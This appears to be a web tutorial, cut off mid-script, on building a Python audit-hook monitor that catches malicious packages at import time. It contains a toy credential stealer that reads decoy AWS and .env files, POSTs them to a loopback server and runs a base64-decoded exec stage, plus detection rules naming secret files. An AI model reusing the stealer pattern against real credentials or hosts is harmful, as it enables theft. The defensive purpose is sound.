TRENDING
Close-up of the Rosetta Stone showing the Demotic script above and the Greek script below, the same text written in two different scripts
October 6, 2026
How to Prepare Your Python Code for the Python 3.15 UTF-8 Default and Fix Windows Encoding Bugs
A row of green and grey fibre broadband street cabinets on a pavement beside a fence in Iver, England
October 6, 2026
BT’s TalkTalk Rescue Turns Telecom Continuity Into a New Merger-Control Ground
An ornate cast-iron wall mailbox with its door hanging open, stuffed with colorful flyers and a yellow flyer bulging out of the top slot
October 6, 2026
Google Stops Accepting Product Bug Reports for Its Open-Source Bounty, Citing Automated Submissions
Chronophotograph by Étienne-Jules Marey of a man riding a bicycle, showing five snapshots of the same ride taken at regular intervals
October 6, 2026
How to Find Slow Python Code With the Python 3.15 Tachyon Sampling Profiler
Close-up of an airport baggage tag reading Stockholm Arlanda and ARN
October 6, 2026
Cloudflare Traces Turns Distributed Tracing Into a Trust Decision at the Edge
06 Oct 2026
SXZ.io SXZ.io
  • Home
Search the Site
Popular Searches:
Technology Amazon AI
Recent Posts
Shelves of old books fastened by iron chains in the Francis Trigge Chained Library in Grantham, England, a picture of data that can be read but not changed
How to Use frozendict in Python 3.15 to Freeze Config and Cache Dictionary Arguments
October 5, 2026
Row of capsule hotel pods with white pillows and folded blankets, each capsule an idle sleeper packed into a shared rack
Kubernetes Node Swap Turns Idle Agent Memory Into a Density Bet With No Wake-Up Test
October 5, 2026
Denmark’s oldest church book, from Holmens parish, open on a stack of books; its handwritten pages record births between 1617 and 1639
Denmark Says 8.8 Million Population Register Records Were Pulled Through One Company’s Lawful Access
October 5, 2026
SXZ.io SXZ.io
  • Home

Categories

Articles 226 Posts
News 228 Posts
Learning Hub 198 Posts
Home/Learning Hub/How to Catch a Malicious Python Package at Import Time With Audit Hooks
Learning Hub

How to Catch a Malicious Python Package at Import Time With Audit Hooks

Build a small monitor on sys.addaudithook that imports a package in a throwaway process, names the lines that read secrets, open connections or spawn processes, and stops them.

October 2, 2026 33 Min Read
23

When you import a Python package, its code runs with all of your permissions. Most packages use that power to define functions. A malicious one can use it to read the files that hold your cloud keys, send them to a server it controls, and then decode and run a second stage of code that was never shipped in readable form. Supply chain attacks differ in how they get a package in front of your interpreter, but they share one moment: some code the attacker wrote runs on a developer laptop or a CI runner. The ChainDrop npm worm and the campaign behind the npm runtime-malware tutorial on this site are two recent examples of that pattern in another ecosystem.

Table Of Content

  • What an audit hook is, in plain language
  • Before you start
  • Step 1: Watch Python announce what it is about to do
  • Step 2: Build a harmless stand-in for a malicious package
  • Step 3: Why counting events is not enough
  • Step 4: Blame the package, not the standard library
  • Rule one: a hook must not trigger its own events
  • Rule two: ask who asked
  • The policy: auditrules.py
  • The engine: auditwatch.py
  • Run it in record mode
  • Step 5: From watching to stopping
  • Block mode raises an exception inside the package
  • Kill mode ends the process
  • Allow-lists make exceptions explicit
  • Step 6: Where the tripwire fails
  • Gap one: reads that never call open()
  • Gap two: a package that blinds the monitor
  • Gap three: an earlier hook can veto yours
  • What the experiments showed
  • Step 7: Check it against real packages
  • Step 8: Lock the behavior in with tests
  • Putting it to work in CI
  • Common mistakes
  • What a tripwire cannot replace
  • Where to go next
  • Sources

That npm tutorial reads a package’s code without running it. This tutorial is its runtime counterpart for Python. You will import a package in a throwaway process and watch what it actually does, using a feature built into the interpreter called audit hooks. By the end you will have a monitor of under 190 lines that names the exact line of a package that read a secret file, opened a network connection, started a process or ran decoded code, can stop the package at that moment, exits with a code a CI job can act on, and is covered by 20 passing tests. Along the way you will break the monitor on purpose, so you know where it can be trusted and where it cannot.

What an audit hook is, in plain language

Before Python does something sensitive, such as opening a file, connecting a socket, starting a process, compiling a string of code or loading a native library, it raises an audit event. An event has a name like open or socket.connect and a tuple of arguments that describes the action. An audit hook is a function with the signature hook(event, args) that you register with sys.addaudithook(). Python calls it for every event. According to the documentation, “Hooks can then log the event, raise an exception to abort the operation, or terminate the process entirely.” Audit hooks arrived in Python 3.8 with PEP 578.

The same documentation page is blunt about what hooks are not. They are meant for collecting information about actions that are otherwise hard to observe, and “malicious code can trivially disable or bypass hooks added using this function”. It adds that security-sensitive hooks “must be added using the C API PySys_AddAuditHook() before initialising the runtime” and that modules allowing arbitrary memory modification, such as ctypes, “should be completely removed or closely monitored”. So think of an audit hook as a tripwire, not a cage. A tripwire is still valuable: it catches careless and automated malware, and it tells you what a dependency really does. PEP 578 explains the gap it fills: “Auditing bypass can occur when the typical system tool used for an action would ordinarily report its use”, which is what happens when an operating-system monitor never sees the work a Python library does on your behalf.

Before you start

You need Python 3.8 or newer. I ran every step on Python 3.13.14 on Windows 11. The code is standard-library Python and should port, but I have not run it on Linux or macOS, so event details such as exactly which events a process launch raises can differ there. One lab package, nativeread in Step 6, uses the Windows C runtime and only works on Windows. You should be comfortable with functions, imports and the subprocess module. Step 7 needs internet access and pip, and Step 8 needs pytest (pip install pytest).

Create an empty folder such as auditlab and save each file below under the path in its first comment line, creating subfolders as you go. Keep the first comment line, because the line numbers printed by the monitor count it. Your event counts will differ slightly from mine, since they depend on your Python version and on whether compiled .pyc files already exist for the lab files.

A safety note. The “malicious” package in this lab is a harmless stand-in. It reads only decoy files inside the lab folder and talks only to a server on 127.0.0.1 that you start yourself. Never point these experiments at real credentials, and do not download real malware to test the tool.

Step 1: Watch Python announce what it is about to do

The fastest way to understand audit events is to look at some. This script registers a hook that records a handful of event types, then performs six ordinary actions: open a file, import a module for the first time, run a string with exec(), listen on a socket and connect to it, start a child process, and read an environment variable. After each action it prints the events that action caused.

# step1_events.py
"""Step 1: watch the interpreter announce what it is about to do."""
import os
import socket
import subprocess
import sys
import sysconfig
from collections import Counter

SHOW = {"open", "import", "compile", "exec", "socket.bind", "socket.getaddrinfo",
        "socket.connect", "subprocess.Popen", "_winapi.CreateProcess"}
total, lines = Counter(), []


def brief(event, args):
    if event == "import":
        return f"module={args[0]}"
    if event == "open":
        return f"path={os.path.basename(str(args[0]))} mode={args[1]}"
    if event == "compile":
        return f"filename={args[1]}"
    if event == "exec":
        return f"code from {args[0].co_filename}"
    if event in ("socket.bind", "socket.connect"):
        return f"address={args[1]}"
    if event == "socket.getaddrinfo":
        return f"host={args[0]} port={args[1]}"
    if event == "_winapi.CreateProcess":
        return f"command_line={args[1]!r}"
    return f"args={args[1]}"                      # subprocess.Popen


def hook(event, args):
    total[event] += 1
    if event in SHOW:
        lines.append(f"{event:<19} {brief(event, args)}")


sys.addaudithook(hook)
out = []


def step(title, action):
    start = len(lines)
    action()
    out.append(f"-- {title}")
    out.extend("   " + line for line in lines[start:])


def read_file():
    open(__file__).close()


def first_import():
    import colorsys  # noqa: F401


def dynamic_code():
    exec("answer = 6 * 7")


def network():
    server = socket.socket()
    server.bind(("127.0.0.1", 0))
    server.listen()
    PORT[0] = server.getsockname()[1]
    socket.create_connection(("127.0.0.1", PORT[0]), timeout=2).close()
    server.close()


def spawn():
    subprocess.run([sys.executable, "-c", "pass"])


PORT = [0]
step("open a file", read_file)
step("import a module for the first time", first_import)
step("run a string with exec()", dynamic_code)
step("listen on a socket and connect to it", network)
step("start a child process", spawn)
before = sum(total.values())
token = os.environ.get("CI_TOKEN")
out.append(f"-- read an environment variable\n   events raised: {sum(total.values()) - before}")
text = "\n".join(out).replace(str(PORT[0]), "<port>").replace(sys.executable, "<python>")
text = text.replace(sysconfig.get_paths()["stdlib"], "<stdlib>")
print(text)
print(f"distinct event names seen: {len(total)}")

Run it with python step1_events.py. You should see something like this:

-- open a file
   open                path=step1_events.py mode=r
-- import a module for the first time
   import              module=colorsys
   open                path=colorsys.cpython-313.pyc mode=r
   exec                code from <stdlib>\colorsys.py
-- run a string with exec()
   compile             filename=<string>
   exec                code from <string>
-- listen on a socket and connect to it
   socket.bind         address=('127.0.0.1', 0)
   import              module=encodings.idna
   open                path=idna.cpython-313.pyc mode=r
   exec                code from <stdlib>\encodings\idna.py
   import              module=stringprep
   open                path=stringprep.cpython-313.pyc mode=r
   exec                code from <stdlib>\stringprep.py
   import              module=unicodedata
   import              module=unicodedata
   socket.getaddrinfo  host=127.0.0.1 port=<port>
   socket.connect      address=('127.0.0.1', <port>)
-- start a child process
   subprocess.Popen    args=<python> -c pass
   _winapi.CreateProcess command_line='\x02'
-- read an environment variable
   events raised: 0
distinct event names seen: 11

Read the output from top to bottom. Opening a file raised open with the path and the mode. Importing colorsys for the first time raised import, then an open for its compiled .pyc file, then exec with the module’s code: when you import a module, Python runs the module’s body with exec. Remember that, because it matters in Step 3. Calling exec("answer = 6 * 7") raised compile and then exec, and the filename <string> tells you the code did not come from a file.

The network lines show something I did not plan. The first address lookup made Python import its idna codec and the modules that codec needs before the socket.getaddrinfo and socket.connect events appeared. The standard library does hidden work on your behalf, and a hook sees all of it. The process launch shows the argument list in the subprocess.Popen event. On Windows it also raises _winapi.CreateProcess, and look at what that event reports as the command line: the single character \x02, not the command. I did not investigate why, but it is a useful warning that event arguments should be checked before you build a rule on them. The subprocess.Popen event carries the real command, so the rules later in this tutorial report only the event name for _winapi.CreateProcess.

The last line is the most important one in the output. Reading an environment variable raised zero events. A value that is already in memory crosses no boundary, so there is nothing to announce. Keep that in mind until Step 6. Two facts from the documentation make events safe to build on. The audit events table “contains all events raised by sys.audit() or PySys_Audit() calls throughout the CPython runtime and the standard library”, and “The number and types of arguments for a given event are considered a public and stable API and should not be modified between releases.” The count of distinct event names on the last line is specific to my machine and Python version.

Step 2: Build a harmless stand-in for a malicious package

To test a monitor you need something to catch. The lab needs three things: decoy secrets that look like the files malware goes after, a local server that plays the attacker, and a package that behaves like a credential stealer at import time. Start with the decoys. Save the first file as fixtures/lab_home/.aws/credentials and the second as fixtures/lab_home/.env. The values are placeholders (the access key ID ends in EXAMPLE, the usual marker for documentation keys), and the lab never reads the real home directory.

[default]
aws_access_key_id = AKIAIOSFODNN7EXAMPLE
aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
DATABASE_URL=postgres://demo:demo-password@localhost:5432/demo
STRIPE_API_KEY=sk_test_EXAMPLE_not_a_real_key

Next, labenv.py holds the support code. Collector is the stand-in attacker: a tiny HTTP server on 127.0.0.1 that keeps every POST body it receives. run_python() starts a child Python with four environment variables: PYTHONPATH (where the toy packages live), LAB_HOME (where the decoy home is), QC_PORT (which port to “phone home” to) and CI_TOKEN (a fake token for the toy to steal). clean() hides the random port and your folder path so that outputs are readable and repeatable.

# labenv.py
"""Lab support: a loopback 'attacker' server and a helper that runs Python with the lab environment."""
import json
import os
import subprocess
import sys
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from pathlib import Path

LAB = Path(__file__).resolve().parent
PKGS = LAB / "fixtures" / "pkgs"
HOME = LAB / "fixtures" / "lab_home"
(LAB / "out").mkdir(exist_ok=True)           # reports and saved output go here


class Collector:
    """Stand-in for an attacker's server: keeps every POST body it receives. Loopback only."""

    def __init__(self):
        received = self.received = []

        class Handler(BaseHTTPRequestHandler):
            def do_POST(self):
                size = int(self.headers.get("Content-Length", 0))
                received.append(json.loads(self.rfile.read(size)))
                self.send_response(204)
                self.end_headers()

            def log_message(self, *args):
                pass

        self.server = HTTPServer(("127.0.0.1", 0), Handler)
        self.port = self.server.server_address[1]
        threading.Thread(target=self.server.serve_forever, daemon=True).start()

    def close(self):
        self.server.shutdown()


def run_python(args, port, **extra_env):
    """Run the lab's Python with the toy packages on the path and a decoy home directory."""
    env = {**os.environ, "PYTHONPATH": str(PKGS), "LAB_HOME": str(HOME), "QC_PORT": str(port),
           "CI_TOKEN": "ghp_EXAMPLE_not_a_real_token", **extra_env}
    return subprocess.run([sys.executable, *args], cwd=LAB, env=env, capture_output=True, text=True, timeout=120)


def clean(text, port):
    """Make output reproducible: hide the random port and this machine's lab path."""
    return text.replace(str(port), "<port>").replace(str(LAB), "<lab>").replace(str(LAB).replace("\\", "/"), "<lab>")

Now the toy itself. Save it as fixtures/pkgs/quickcolors/__init__.py. On the surface it is a color helper with one function, paint(). Underneath, the code at the bottom runs the moment anyone imports it. _telemetry() reads the two decoy files, adds an environment variable, POSTs everything to the local server, runs whoami as a stand-in for dropping a helper program, and finally decodes a base64 string and passes it to exec(), the “second-stage loader” pattern. The whole thing sits in try/except Exception: pass, because malware often hides its failures. That detail will matter in Step 5.

# fixtures/pkgs/quickcolors/__init__.py
"""quickcolors: tiny ANSI color helpers. A toy supply-chain sample for a security lab.

Everything dangerous happens at import time and is kept harmless: it reads only the
decoy files named by LAB_HOME and talks only to a loopback server named by QC_PORT.
"""
import base64
import json
import os
import subprocess
import urllib.request
from pathlib import Path

COLORS = {"red": "31", "green": "32", "blue": "34"}


def paint(text, color="green"):
    return f"\033[{COLORS[color]}m{text}\033[0m"


STAGE_TWO = "cHJpbnQoJ3N0YWdlLTIgbG9hZGVyIHJhbicp"   # base64 of print('stage-2 loader ran')


def _telemetry():
    home = Path(os.environ["LAB_HOME"])            # never the real home directory
    loot = {rel: (home / rel).read_text() for rel in (".aws/credentials", ".env")}
    loot["ci_token"] = os.environ.get("CI_TOKEN", "")
    url = f"http://127.0.0.1:{os.environ['QC_PORT']}/collect"
    request = urllib.request.Request(url, data=json.dumps(loot).encode(), method="POST")
    urllib.request.urlopen(request, timeout=2).read()
    subprocess.run(["whoami"], capture_output=True)  # stand-in for dropping a persistence helper
    exec(base64.b64decode(STAGE_TWO).decode())       # second-stage loader


try:
    _telemetry()
except Exception:
    pass                                             # real malware hides its failures

You also need an innocent bystander, or you cannot tell whether your monitor raises false alarms. tinytable renders rows as a text table. At import it reads its own data file, defines a dataclass and a namedtuple. All of that is normal, and as you will see in Step 3, it makes Python call exec and open dozens of times. Save the package as fixtures/pkgs/tinytable/__init__.py and its data file, the JSON block that follows, next to it as fixtures/pkgs/tinytable/defaults.json.

# fixtures/pkgs/tinytable/__init__.py
"""tinytable: render rows as a plain-text table. A benign lab sample that reads its own data file."""
import json
from collections import namedtuple
from dataclasses import dataclass
from pathlib import Path

_DEFAULTS = json.loads((Path(__file__).parent / "defaults.json").read_text())
Column = namedtuple("Column", "title width")


@dataclass
class Style:
    sep: str = _DEFAULTS["sep"]
    pad: int = _DEFAULTS["pad"]


def render(rows, style=None):
    style = style or Style()
    widths = [max(len(str(cell)) for cell in col) + style.pad for col in zip(*rows)]
    lines = (style.sep.join(str(c).ljust(w) for c, w in zip(row, widths)) for row in rows)
    return "\n".join(line.rstrip() for line in lines)
{"sep": " | ", "pad": 1}

Finally, import the toy with no monitor at all and see what happens:

# step2_unmonitored.py
"""Step 2: import the toy package with no monitor and see what leaves the machine."""
import json

from labenv import Collector, clean, run_python

collector = Collector()
code = "import quickcolors; print('paint ->', repr(quickcolors.paint('hi', 'green')))"
result = run_python(["-c", code], collector.port)
print("child output:")
print(clean(result.stdout, collector.port).rstrip())
print("child exit code:", result.returncode)
print("the 'attacker' server received", len(collector.received), "POST body:")
print(json.dumps(collector.received[0], indent=2))
collector.close()

Run python step2_unmonitored.py:

child output:
stage-2 loader ran
paint -> '\x1b[32mhi\x1b[0m'
child exit code: 0
the 'attacker' server received 1 POST body:
{
  ".aws/credentials": "[default]\naws_access_key_id = AKIAIOSFODNN7EXAMPLE\naws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\n",
  ".env": "DATABASE_URL=postgres://demo:demo-password@localhost:5432/demo\nSTRIPE_API_KEY=sk_test_EXAMPLE_not_a_real_key\n",
  "ci_token": "ghp_EXAMPLE_not_a_real_token"
}

Notice how unremarkable this looks from the outside. The import succeeded, the exit code is 0, and paint() works. The only visible hint is the line stage-2 loader ran, which a real attacker would not print. Meanwhile the local server received the decoy AWS keys, the decoy .env file and the environment token. That is the behavior we want to detect. To check your lab works, confirm that the JSON body appears in your output.

Step 3: Why counting events is not enough

The simplest monitor counts the interesting events and reports them. It takes fewer than twenty lines, so try it first and see what it can tell you.

# naive_watch.py
"""First attempt: count the interesting events, no matter who asked for them."""
import importlib
import sys
from collections import Counter

INTERESTING = {"open", "exec", "compile", "socket.connect", "socket.getaddrinfo", "subprocess.Popen"}
counts = Counter()


def hook(event, args):
    if event in INTERESTING:
        counts[event] += 1


sys.addaudithook(hook)
importlib.import_module(sys.argv[1])
print(sys.argv[1], dict(sorted(counts.items())))
# step3_naive.py
"""Step 3: run the naive counter on a benign package and on the toy."""
from labenv import Collector, clean, run_python

collector = Collector()
for name in ("tinytable", "quickcolors"):
    result = run_python(["naive_watch.py", name], collector.port)
    print(clean(result.stdout, collector.port).strip())
collector.close()

Run python step3_naive.py:

tinytable {'compile': 14, 'exec': 50, 'open': 35}
stage-2 loader ran
quickcolors {'compile': 9, 'exec': 79, 'open': 73, 'socket.connect': 1, 'socket.getaddrinfo': 1, 'subprocess.Popen': 1}

The benign package, tinytable, produced 50 exec events and dozens of open events. The malicious one produced 79 exec events and a similar flood of opens. The counts that actually differ are the last three, socket.getaddrinfo, socket.connect and subprocess.Popen, and even those do not say who asked: a harmless package can connect a socket too. Worse, the secret-file reads are lost in the noise, because the decoy files are just two more open events among dozens of ordinary ones.

The lesson is that an event tells you what Python is about to do, not who wants it done. Most of those exec events came from the import system running module bodies, and the rest from library code that generates methods, such as dataclasses. None came from tinytable calling exec itself. To separate the innocent from the guilty, the monitor needs to ask who asked.

Step 4: Blame the package, not the standard library

Rule one: a hook must not trigger its own events

Before the real monitor, one trap that catches almost everyone. Python calls your hook for every event, including events caused by the hook’s own work. If the hook opens a log file, that open raises an event, which calls the hook, which opens the file again:

# step4b_recursion.py
"""A hook that does work which itself raises audit events calls itself until Python gives up."""
import os
import sys

depth = 0
armed = True


def careless_hook(event, args):
    global depth
    if not armed:
        return
    depth += 1
    with open(os.devnull, "a") as fh:             # open() raises an "open" event, which calls this hook again
        fh.write(event)


sys.addaudithook(careless_hook)
try:
    open(__file__).close()
except RecursionError as exc:
    print("open() failed with", type(exc).__name__)
armed = False                                      # a hook cannot be removed, so switch this one off
print("the hook called itself more than once:", depth > 1)
open() failed with RecursionError
the hook called itself more than once: True

Python eventually gives up with a RecursionError, and it surfaces in the code that tried to open a file, not in your hook. Notice the last lines of the script: a hook cannot be removed (PEP 578 says it plainly: “Hooks cannot be removed or replaced.”), so the script switches its hook off with a flag. The real monitor uses the same idea with a thread-local flag that makes the hook ignore events raised while it is already running.

Rule two: ask who asked

At the moment an event is raised, the Python call stack still holds the answer. If the toy calls urllib.request.urlopen(), several layers of standard-library code (urllib, http.client, socket) sit between the toy’s line and the socket.connect event. The monitor walks outward from the frame that triggered the event until it finds a frame whose file is not the standard library, not a frozen module, not an exec’d string (file names starting with <) and not the monitor itself. That frame belongs to the code responsible, and its file name and line number go into the report.

There is one refinement. For file, network and process events, any depth counts: if a package’s line led to the connection, the package is responsible. For exec, depth matters. As Step 3 showed, the import system and dataclasses call exec on behalf of ordinary packages, so the monitor reports exec only when the package’s own frame made the call. The helper returns a second value, direct, for exactly that purpose.

The policy: auditrules.py

The policy lives in its own file so you can read and tune it without touching the engine. It defines seven rules. read-secret flags opening credential locations such as .aws, .ssh and .env. write-persist flags writing to places that give an attacker a foothold: shell startup files, sitecustomize.py, CI workflow folders, and .pth files. The .pth case deserves a sentence: the site module documentation says “Lines starting with import (followed by space or tab) are executed” and that “An executable line in a .pth file is run at every Python startup, regardless of whether a particular module is actually going to be used.” network flags address lookups, connects, binds and sends that are not on an allow-list. spawn flags process creation. dynamic-code flags exec. native-call flags loading native libraries through ctypes. tamper flags attempts to look inside the interpreter, such as walking every object the garbage collector tracks, which an ordinary package has no reason to do while it is being imported (Step 6 shows why this rule matters). The function judge() maps one event to a rule, and it deliberately knows nothing about who asked.

# auditrules.py
"""The policy: which audit events count as suspicious. It knows nothing about who triggered them."""
import os
from pathlib import PurePath

SECRET_DIRS = {".aws", ".ssh", ".gnupg", ".kube", ".azure", ".docker"}
SECRET_FILES = {".env", ".npmrc", ".pypirc", ".netrc", ".git-credentials"}
PERSIST_FILES = {".bashrc", ".zshrc", ".profile", "sitecustomize.py", "usercustomize.py"}
NET_EVENTS = {"socket.connect", "socket.bind", "socket.sendto", "socket.getaddrinfo"}
SPAWN_EVENTS = {"subprocess.Popen", "os.system", "os.spawn", "os.exec", "os.posix_spawn",
                "os.startfile", "_winapi.CreateProcess"}
NATIVE_EVENTS = {"ctypes.dlopen", "ctypes.dlsym", "ctypes.call_function", "ctypes.cdata"}
TAMPER_EVENTS = {"gc.get_objects", "gc.get_referrers", "gc.get_referents", "sys.settrace",
                 "sys.setprofile", "sys._current_frames", "sys.addaudithook"}
WATCHED = {"open", "exec"} | NET_EVENTS | SPAWN_EVENTS | NATIVE_EVENTS | TAMPER_EVENTS
RULES = ["read-secret", "write-persist", "network", "spawn", "dynamic-code", "native-call", "tamper"]


def short(path):
    """Show paths relative to the working directory when they are inside it."""
    try:
        rel = os.path.relpath(path)
    except ValueError:
        return path
    return (path if rel.startswith("..") else rel).replace("\\", "/")


def judge(event, args, allow_net=()):
    """Return (rule, detail) when an event breaks policy, else None."""
    if event == "open" and not isinstance(args[0], int):
        full = os.path.abspath(os.fsdecode(args[0]))
        pure = PurePath(full)
        parts, name = {p.lower() for p in pure.parts}, pure.name.lower()
        if parts & SECRET_DIRS or name in SECRET_FILES:
            return "read-secret", short(full)
        mode, flags = args[1] or "", args[2] or 0
        writing = bool(set(mode) & set("wax+")) or bool(flags & (os.O_WRONLY | os.O_RDWR | os.O_APPEND))
        if writing and (name in PERSIST_FILES or name.endswith(".pth") or {".github", "workflows"} <= parts):
            return "write-persist", short(full)
    elif event in NET_EVENTS:
        if event == "socket.getaddrinfo":
            target = f"{args[0]}:{args[1]}"
        else:
            address = args[1]
            target = f"{address[0]}:{address[1]}" if isinstance(address, tuple) else str(address)
        if target not in allow_net:
            return "network", f"{event} {target}"
    elif event in SPAWN_EVENTS:
        if event == "_winapi.CreateProcess":      # its command_line argument arrived as junk on 3.13.14
            return "spawn", event
        return "spawn", f"{event} {args[1] if event == 'subprocess.Popen' else args[0]}"
    elif event == "exec":
        return "dynamic-code", f"exec of code from {args[0].co_filename}"
    elif event in NATIVE_EVENTS:
        return "native-call", f"{event} {args[1] if event == 'ctypes.dlsym' else args[0]}"
    elif event in TAMPER_EVENTS:
        return "tamper", event
    return None

The engine: auditwatch.py

The engine registers the hook and decides what to do with each verdict. Read it in this order. is_ours() and culprit() implement rule two. They also special-case site-packages, because on some installations (including the Python installation on this machine) the site-packages folder lives inside the standard library folder, and without the check every third-party package would look like the standard library. install() builds the hook as a closure. The hook counts every event, returns at once for events it does not watch, calls judge() first because it is cheap, and walks the stack only when a rule might apply. It then records a finding with the rule, the event, a detail and the file and line of the culprit. Three modes decide what happens next. In record mode nothing else happens. In block mode the hook raises AuditViolation inside the offending code, which aborts the operation. In kill mode it writes the report and calls os._exit(86), the “terminate the process entirely” option from the documentation. The last lines of install() check that the hook really got installed, which Step 6 explains. main() imports the target module, prints a summary and returns an exit code: 0 for clean, 3 for findings.

# auditwatch.py
"""auditwatch: import a package under a Python audit hook, report what it tries to do, optionally stop it."""
import argparse
import importlib
import json
import os
import sys
import sysconfig
import threading
from collections import Counter
from pathlib import PurePath

from auditrules import RULES, WATCHED, judge, short

CANARY = "auditwatch.canary"


class AuditViolation(RuntimeError):
    """Raised inside the code that attempted a forbidden action (block mode)."""


_STDLIB = {os.path.normcase(p) for p in (sysconfig.get_paths()["stdlib"], sysconfig.get_paths()["platstdlib"])}
_SELF = os.path.normcase(os.path.abspath(__file__))


def is_ours(filename):
    """True for code we never blame: the standard library, frozen modules, exec'd strings, this file."""
    if filename.startswith("<"):
        return True
    name = os.path.normcase(filename)
    if name == _SELF:
        return True
    if {"site-packages", "dist-packages"} & set(PurePath(name).parts):
        return False
    return any(name.startswith(root + os.sep) for root in _STDLIB)


def culprit():
    """The first frame outside the stdlib, and whether that frame made the audited call itself."""
    frame, direct = sys._getframe(2), True   # 0 = this function, 1 = the hook, 2 = whoever triggered the event
    while frame is not None:
        if not is_ours(frame.f_code.co_filename):
            return frame, direct
        frame, direct = frame.f_back, False
    return None, False


def install(mode="record", allow=(), allow_net=(), report=None):
    """Register the hook. Returns the findings list, the event counter and a function that writes the report."""
    findings, seen, busy = [], Counter(), threading.local()
    allow, allow_net, canary = set(allow), set(allow_net), []

    def dump():
        data = {"mode": mode, "events_total": sum(seen.values()), "events": dict(seen), "findings": findings}
        if report:
            with open(report, "w") as fh:
                json.dump(data, fh, indent=2)

    def hook(event, args):
        if event == CANARY:
            canary.append(True)
            return
        if getattr(busy, "on", False):       # events raised by the hook's own work are not interesting
            return
        busy.on = True
        try:
            seen[event] += 1
            if event not in WATCHED:
                return
            try:
                verdict = judge(event, args, allow_net)
            except (IndexError, TypeError, ValueError):
                return
            if verdict is None or verdict[0] in allow:
                return
            frame, direct = culprit()
            if frame is None or (verdict[0] == "dynamic-code" and not direct):
                return
            rule, detail = verdict
            where = f"{short(frame.f_code.co_filename)}:{frame.f_lineno}"
            findings.append({"rule": rule, "event": event, "detail": detail, "where": where})
            if mode == "kill":
                dump()
                os._exit(86)
            if mode == "block":
                raise AuditViolation(f"{rule}: {detail}")
        finally:
            busy.on = False

    sys.addaudithook(hook)
    sys.audit(CANARY)                        # an earlier hook can veto ours silently, so prove it runs
    if not canary:
        raise RuntimeError("auditwatch: the hook was not installed, an earlier hook vetoed it")
    return findings, seen, dump


def main(argv=None):
    ap = argparse.ArgumentParser(description=__doc__)
    ap.add_argument("--import", dest="target", required=True, metavar="MODULE")
    ap.add_argument("--mode", choices=["record", "block", "kill"], default="record")
    ap.add_argument("--allow", action="append", default=[], choices=RULES, metavar="RULE")
    ap.add_argument("--allow-net", action="append", default=[], metavar="HOST:PORT")
    ap.add_argument("--report", default="auditwatch-report.json")
    opts = ap.parse_args(argv)
    findings, seen, dump = install(opts.mode, opts.allow, opts.allow_net, opts.report)
    error = None
    try:
        importlib.import_module(opts.target)
    except Exception as exc:
        error = f"{type(exc).__name__}: {exc}"
    dump()
    print(f"auditwatch: imported {opts.target} in {opts.mode} mode, {sum(seen.values())} events seen")
    if error:
        print(f"  import error: {error}")
    groups = {}
    for f in findings:
        groups.setdefault((f["rule"], f["where"]), []).append(f["detail"])
    for (rule, where), details in groups.items():
        print(f"  {rule:<13} {where}")
        for detail in dict.fromkeys(details):
            print(f"      {detail}")
    if not findings:
        print("  no findings")
    return 3 if findings else 0


if __name__ == "__main__":
    sys.exit(main())

Run it in record mode

This driver runs the monitor in record mode against both packages, then prints a finding as it is stored in the JSON report. Run python step4_record.py.

# step4_record.py
"""Step 4: the real monitor in record mode, on a benign package and on the toy."""
import json
import shutil

from labenv import LAB, Collector, clean, run_python

collector = Collector()
for name in ("tinytable", "quickcolors"):
    cmd = ["auditwatch.py", "--mode", "record", "--import", name]
    result = run_python(cmd, collector.port)
    print("$ python " + " ".join(cmd))
    print(clean(result.stdout, collector.port).rstrip())
    print("exit code:", result.returncode)
    print()
    shutil.copy(LAB / "auditwatch-report.json", LAB / "out" / f"record-{name}.json")
report = json.load(open("out/record-quickcolors.json"))
print("one finding as stored in auditwatch-report.json:")
print(json.dumps(report["findings"][0], indent=2))
print("events by name (top 6):", dict(sorted(report["events"].items(), key=lambda kv: -kv[1])[:6]))
collector.close()

First the benign package:

$ python auditwatch.py --mode record --import tinytable
auditwatch: imported tinytable in record mode, 123 events seen
  no findings
exit code: 0

The innocent package passes with “no findings”, even though Step 3 showed it produced dozens of exec and open events. Those events were attributed to the standard library, not blamed on tinytable. Now the toy:

$ python auditwatch.py --mode record --import quickcolors
stage-2 loader ran
auditwatch: imported quickcolors in record mode, 253 events seen
  read-secret   fixtures/pkgs/quickcolors/__init__.py:26
      fixtures/lab_home/.aws/credentials
      fixtures/lab_home/.env
  network       fixtures/pkgs/quickcolors/__init__.py:30
      socket.getaddrinfo 127.0.0.1:<port>
      socket.connect 127.0.0.1:<port>
  spawn         fixtures/pkgs/quickcolors/__init__.py:31
      subprocess.Popen whoami
      _winapi.CreateProcess
  dynamic-code  fixtures/pkgs/quickcolors/__init__.py:32
      exec of code from <string>
exit code: 3

Each finding names a rule and a line in quickcolors/__init__.py. Open the file and compare: line 26 is the dictionary comprehension that reads the two decoy files, line 30 is the urlopen() call, line 31 is subprocess.run(), and line 32 is exec(). The environment-variable read on line 27 is not listed, exactly as Step 1 predicted. The two lines under spawn are two views of one action on Windows. The exit code of 3 is what a CI job would use to fail a build.

one finding as stored in auditwatch-report.json:
{
  "rule": "read-secret",
  "event": "open",
  "detail": "fixtures/lab_home/.aws/credentials",
  "where": "fixtures/pkgs/quickcolors/__init__.py:26"
}
events by name (top 6): {'import': 61, 'exec': 49, 'open': 46, 'marshal.loads': 42, 'object.__setattr__': 10, 'compile': 7}

The JSON report keeps every event name and count (the monitor wrote it to auditwatch-report.json), which is handy for comparing one version of a dependency with the next.

Step 5: From watching to stopping

Record mode only watches. To stop a package, you choose between two enforcement modes, and the difference is the most practical lesson in this tutorial. This driver runs the toy under block mode, under kill mode, and under record mode with one network endpoint allowed. Run python step5_enforce.py.

# step5_enforce.py
"""Step 5: block mode, kill mode, and a narrow allow-list."""
import json

from labenv import Collector, clean, run_python


def show(result, collector):
    print(clean(result.stdout, collector.port).rstrip())
    print("exit code:", result.returncode, "| bodies received by the attacker server:", len(collector.received))
    print()


collector = Collector()
print("=== block mode")
show(run_python(["auditwatch.py", "--mode", "block", "--report", "out/block.json", "--import", "quickcolors"],
                collector.port), collector)
collector.close()

collector = Collector()
print("=== kill mode")
show(run_python(["auditwatch.py", "--mode", "kill", "--report", "out/kill.json", "--import", "quickcolors"],
                collector.port), collector)
report = json.load(open("out/kill.json"))
print("report written before the process died:", [(f["rule"], f["event"]) for f in report["findings"]])
print()
collector.close()

collector = Collector()
print("=== record mode with one endpoint allowed")
allowed = f"127.0.0.1:{collector.port}"
